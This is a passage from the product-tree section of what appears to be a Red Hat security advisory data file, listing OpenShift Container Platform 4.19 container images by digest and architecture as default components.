"product_reference": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x as a component of Red Hat OpenShift Container Platform 4.19",
